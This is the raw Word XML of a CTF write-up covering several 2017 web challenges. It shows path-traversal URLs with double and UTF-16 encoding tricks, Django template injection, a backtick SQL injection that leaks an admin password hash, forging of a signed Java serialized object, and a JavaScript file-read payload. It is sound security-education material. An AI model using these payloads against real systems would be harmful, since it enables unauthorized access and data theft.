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Theme="minorAscii"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Orange v3:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>This is a modified version of the first orange task, this time blocking %2E(.) doubleurlencoding and any other extension except .txt and dots (other chars too), so after a while we realised we can parse a utf-16 char that ends with 2E.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">For example : </w:t>
      </w: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Į</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> LATIN CAPITAL LETTER I WITH OGONEK (U+012E)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/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</w:pPr>
      <w:r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  <w:t>Which will be encoded like %01%2E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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun" w:asciiTheme="minorAscii"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>%01 isnt used according to(</w:t>
      </w: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t>https://www.obkb.com/dcljr/charstxt.html)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</w:pP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t xml:space="preserve">So trying this on the url : </w:t>
      </w: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instrText xml:space="preserve"> HYPERLINK "http://web.chal.csaw.io:7312/?path=%C4%AE/orange.txt" </w:instrText>
      </w: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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/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t>http://web.chal.csaw.io:7312/?path=%C4%AE/orange.txt</w:t>
      </w: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</w:pP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t xml:space="preserve">Gave the result, now doing </w:t>
      </w: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instrText xml:space="preserve"> HYPERLINK "http://web.chal.csaw.io:7312/?path=%C4%AE%C4%AE/flag.txt" </w:instrText>
      </w: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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/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t>http://web.chal.csaw.io:7312/?path=%C4%AE%C4%AE/flag.txt</w:t>
      </w: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fldChar w:fldCharType="end"/>
      </w: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b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pP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t xml:space="preserve">Gave us the flag : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>flag{s0rry_this_t00k_s0_m@ny_tries...}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</w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Orange v1: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</w:pP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t xml:space="preserve">This one was blocking double dots ‘..’ easy bypass was using double urlencoding of the dot char </w:t>
      </w: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instrText xml:space="preserve"> HYPERLINK "http://web.chal.csaw.io:7311/?path=%252E%252E/flag.txt" </w:instrText>
      </w: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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/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t>http://web.chal.csaw.io:7311/?path=%252E%252E/flag.txt</w:t>
      </w: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Theme="minorAscii"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pP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t xml:space="preserve">Flag : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>flag{thank_you_based_orange_for_this_ctf_challenge}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b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40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b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40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b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Shia Labeouf-off:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Navigating around the website we can find a form vuln to xss and template injection , app was running django which wasn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>’t easy to hack, django doesnt permit a lot of global access, we can just access contructs and tags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Trying {{ user }} in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://web.chal.csaw.io:5490/ad-lib/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>http://web.chal.csaw.io:5490/ad-lib/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Gave us some result, after looking in debug, we find an interesting object (mrpoopy), problem was accessing it, that took a while when we read the debug in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</w:pP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instrText xml:space="preserve"> HYPERLINK "http://web.chal.csaw.io:5490/polls/3/" </w:instrText>
      </w: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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/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t>http://web.chal.csaw.io:5490/polls/3/</w:t>
      </w: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</w:pP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t>So we find that there were custom tags defined (listme, getme)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</w:pP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t xml:space="preserve">Applying this filters to mrpoopy gave good results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</w:pP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t>First : {{ mrpoopy|listme }} which resulted in :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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Cabin" w:eastAsia="Cabin" w:cs="Cabin" w:asciiTheme="minorAscii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['Woohoo', '__doc__', '__flag__', '__module__']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</w:pP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t>Now we now the attribs, we can access them by getme, calling {{ mrpoopy|getme:"__flag__"}}did the job (weird django syntax)</w:t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</w:rPr>
      </w:pP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t xml:space="preserve">And we get the flag : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Cabin" w:eastAsia="Cabin" w:cs="Cabin" w:asciiTheme="minorAscii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flag{wow_much_t3mplate}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imSun" w:eastAsia="SimSun" w:cs="SimSun" w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs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imSun" w:eastAsia="SimSun" w:cs="SimSun" w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>LittleQuery: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imSun" w:eastAsia="SimSun" w:cs="SimSun" w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs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hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>First thing to find is robots.txt contained</w:t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 xml:space="preserve"> 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User-agent: *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Disallow: /api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 xml:space="preserve">After that we find </w:t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instrText xml:space="preserve"> HYPERLINK "http://littlequery.chal.csaw.io/api/db_explore.php" </w:instrText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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/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>http://littlequery.chal.csaw.io/api/db_explore.php</w:t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>Which was indicating we need to specify schema or preview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 xml:space="preserve">Doing </w:t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instrText xml:space="preserve"> HYPERLINK "http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema" </w:instrText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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/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>http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema</w:t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fldChar w:fldCharType="end"/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>We can see the db name : ”littlequery”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instrText xml:space="preserve"> HYPERLINK "http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema&amp;db=littlequery" </w:instrText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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/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>http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema&amp;db=littlequery</w:t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fldChar w:fldCharType="end"/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>: shows table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instrText xml:space="preserve"> HYPERLINK "http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema&amp;db=littlequery&amp;table=user" </w:instrText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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/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>http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema&amp;db=littlequery&amp;table=user</w:t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fldChar w:fldCharType="end"/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 xml:space="preserve"> : shows columns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>To find rows we need to use mode=preview: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instrText xml:space="preserve"> HYPERLINK "http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&amp;db=littlequery&amp;table=user" </w:instrText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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/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>http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&amp;db=littlequery&amp;table=user</w:t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 xml:space="preserve">Hmm not so easy the response was : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman" w:asciiTheme="minorAscii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Database 'littlequery' is not allowed to be previewed.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>Looks like some filter, after playing a while with params we can find a sqli, backtick wasn’t sanitized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 xml:space="preserve">Doing this : </w:t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instrText xml:space="preserve"> HYPERLINK "http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&amp;db=littlequery`&amp;table=users" </w:instrText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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/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>http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&amp;db=littlequery`&amp;table=users</w:t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 xml:space="preserve">Results in : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman" w:asciiTheme="minorAscii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`littlequery``.`users` doesn't exist.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>Need to balance the query now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instrText xml:space="preserve"> HYPERLINK "http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&amp;db=littlequery`.user--%20-&amp;table=" </w:instrText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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/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>http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&amp;db=littlequery`.user--%20-&amp;table=</w:t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Theme="minorAscii"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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 xml:space="preserve">Gave the result : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman" w:asciiTheme="minorAscii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[{"uid":"1","username":"admin","password":"5896e92d38ee883cc09ad6f88df4934f6b074cf8"}]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 xml:space="preserve">We have our admin / password, when trying to login with them it didnt work, the js script was hashing the password, all I had to do is intercept it burp and change the params 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 xml:space="preserve">We find a console with a commented flag : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>flag{mayb3_1ts_t1m3_4_real_real_escape_string?}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rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Not My Cup Of Coffe:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Well this was a good task .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Home page looked like this :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6296660" cy="4222750"/>
            <wp:effectExtent l="0" t="0" r="8890" b="6350"/>
            <wp:docPr id="1" name="Picture 1" descr="Screenshot from 2017-09-16 22-39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7-09-16 22-39-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>So we can make some assumptions from here, name Flag wasnt available, otherwise normal stuff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>Visiting this page :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5267325" cy="2954655"/>
            <wp:effectExtent l="0" t="0" r="9525" b="17145"/>
            <wp:docPr id="2" name="Picture 2" descr="Screenshot from 2017-09-16 22-40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17-09-16 22-40-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>We could create a comment with name and description and choose parents parents were from the list(Covfefe,Passion ....) but Flag wasn’t in list , thats the first interesting thing, when we write something it get’s replaced like first image, each parent has a text .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>Looking at source code :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6207125" cy="2230120"/>
            <wp:effectExtent l="0" t="0" r="3175" b="17780"/>
            <wp:docPr id="3" name="Picture 3" descr="/root/Desktop/Screenshot from 2017-09-16 22-42-40.pngScreenshot from 2017-09-16 22-42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root/Desktop/Screenshot from 2017-09-16 22-42-40.pngScreenshot from 2017-09-16 22-42-40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712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>Which contained some base64 encoded stuff + a hash that looked like sha256 :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>Decoding the base64 showed some java objects each one with the name of the parent in it , from now we understand  the idea of the challenge, we need to forge an object , instead of sending Covfefe.Coffee.., we’ll change the attr with ‘Flag’, but doing it crashes the application, looks like it verifies if the signature (sha256) matches,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>So trying with the existing object we found out that that hash was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>Sha256(base64object+salt) and salt=’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun" w:asciiTheme="minorAscii"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>c@ram31m4cchi@o</w:t>
      </w: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t>’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</w:pPr>
      <w:r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  <w:t>(the salt was found when navigating to admin.jsp can leak passcode : Pas$ion which was checked using Hashcode in java , need just another word with hashcode collision that can pass the chars check, the password : “ParCion” worked just fine  loggin in with that we can find the salt)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imSun" w:eastAsia="SimSun" w:cs="SimSun" w:asciiTheme="minorAscii"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="ar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>After this I took an existing Bean which had 4 chars(like flag) and did a streplace with Flag, that didnt work, apparently some base64 padding incorrect, after that we fixed using hexeditor which looks like this :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5270500" cy="1867535"/>
            <wp:effectExtent l="0" t="0" r="6350" b="18415"/>
            <wp:docPr id="4" name="Picture 4" descr="Screenshot from 2017-09-16 15-49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17-09-16 15-49-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>And reencoded the base64 and sign it with salt, and sent the request :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5009515" cy="3399790"/>
            <wp:effectExtent l="0" t="0" r="635" b="10160"/>
            <wp:docPr id="6" name="Picture 6" descr="Screenshot from 2017-09-16 22-56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17-09-16 22-56-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>Don’t forget to change JSESSIONID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 xml:space="preserve">Now after revisiting main page :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5272405" cy="2292985"/>
            <wp:effectExtent l="0" t="0" r="4445" b="12065"/>
            <wp:docPr id="7" name="Picture 7" descr="Screenshot from 2017-09-16 22-57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17-09-16 22-57-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>We find our injecting thing with the with ‘Flag’ parent , just need to create something pointing to it, and we can see flag (or just refresh)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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6287135" cy="2851785"/>
            <wp:effectExtent l="0" t="0" r="18415" b="5715"/>
            <wp:docPr id="10" name="Picture 10" descr="Screenshot from 2017-09-16 23-00-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from 2017-09-16 23-00-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7135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rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorAscii"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>FuntimeJs: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 xml:space="preserve">So after solving littlequery we get a console and we can run commands, after checking the github link of runtimejs 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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "https://github.com/runtimejs/runtime" </w:instrText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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/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>https://github.com/runtimejs/runtime</w:t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fldChar w:fldCharType="end"/>
      </w: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 xml:space="preserve"> we can find some modules which are default, like ‘fs’ which is important for us, so after getting file read, we run a payload, and try to read flag.txt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>var fs = require("fs");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>fs.readFile("flag.txt", function (err, data) {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 xml:space="preserve">    if (err) throw err;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 xml:space="preserve">    console.log(data.toString());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>});</w:t>
      </w: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left"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="SimSun" w:asciiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>And yes flag was there : flag{I_f0rg0t_1n1trd_1nclud3d_a11_files}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ntarell">
    <w:panose1 w:val="02000503000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="A00002FF" w:usb1="4000A1EA" w:usb2="00000000" w:usb3="00000000" w:csb0="20000097" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Bitstream Charter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Cabin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BFFE1C"/>
    <w:rsid w:val="9FBFFE1C"/>
    <w:rsid w:val="EFFFF17B"/>
    <w:rsid w:val="FFFFCB2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C2C2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2017-09-16T22:16:00Z</dcterms:created>
  <dc:creator>root</dc:creator>
  <cp:lastModifiedBy>root</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-17T21:43:35Z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